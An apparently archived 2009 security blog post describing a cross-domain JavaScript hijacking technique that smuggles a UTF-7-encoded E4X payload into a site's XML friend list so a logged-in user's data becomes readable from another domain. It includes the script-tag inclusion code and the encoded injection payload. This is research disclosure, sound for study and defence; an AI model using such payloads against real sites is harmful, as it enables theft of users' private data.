Inline UTF-7 E4X javascript hijacking

Back to articles

hackvertor

Author:

Gareth Heyes

@hackvertor

Published: Tue, 24 Feb 2009 11:27:19 GMT

Updated: Sat, 22 Mar 2025 15:38:12 GMT

I finally get to talk about this because Yosuke Hasegawa has already disclosed the IE/FF variant with JSON data. I also discovered the UTF-7 JSON hacking independently but I wasn't aware it was public so I didn't blog about it. Just in case you haven't, you should check out his presentation it's awesome!

Anyway onto E4X I just love it :) Currently it is only fully supported by Firefox and maybe Google Chrome I think. It enables you to use XML data within Javascript and has plenty of little quirks I've blogged about in the past. I won't go into detail about what it is, you'll have to Google around for that.

So you can use XML data within javascript that means we can access that data cross domain but only if it's been assigned to a variable right? Well not exactly. You see if we can control any aspect of the XML data we can then poison it with UTF-7 encoded data, this means we can access inline XML without any variable assignment.

Lets take a sample of fictional data that is returned when you're logged onto a web site:-

<pre lang="XML"> &lt;friendList&gt; &lt;friend&gt; &lt;name&gt;Name1&lt;/name&gt; &lt;email&gt;somebody@somewhere1.com&lt;/email&gt; &lt;/friend&gt; &lt;friend&gt; &lt;name&gt;Name2&lt;/name&gt; &lt;email&gt;somebody@somewhere2.com&lt;/email&gt; &lt;/friend&gt; etc... &lt;/friendList&gt; </pre>

So if you can control a new friend within the XML data, we can get the contents of the data remotely by including a SCRIPT tag to the data along with a UTF-7 charset. Here is how the attack would work:-

<pre lang="HTML"> &lt;script defer=&quot;defer&quot; charset=&quot;UTF-7&quot; src=&quot;http://somesite.com/home/friendslist.php&quot;&gt;&lt;/script&gt; &lt;script&gt; window.onload = function() { alert(x); } &lt;/script&gt; </pre>

And we add a new friend called poison with the following data:-

<pre lang="XML"> &lt;friend&gt; &lt;name&gt;Poison&lt;/name&gt; &lt;email&gt;+ADwALwBlAG0AYQBpAGwAPgA8AC8AZgByAGkAZQBuAGQAPgA8AC8AZgByAGkAZQBuAGQATABpAHMAdAA+ADsAeAA9ADwAZgByAGkAZQBuAGQATABpAHMAdAA+ADwAZgByAGkAZQBuAGQAPgA8AGUAbQBhAGkAbAA+-&lt;/email&gt; &lt;/friend&gt; </pre>

If we decode the above UTF-7 string we get the following:-

<pre lang="XML"> &lt;/email&gt;&lt;/friend&gt;&lt;/friendList&gt;;x=&lt;friendList&gt;&lt;friend&gt;&lt;email&gt; </pre>

Notice the "X" assignment, this is how we steal the data. We close the email, friend and friendlist tags within the UTF-7 encoded data and start a new E4X block. A POC is available here which would also work cross domain:-

E4X poc

Back to articles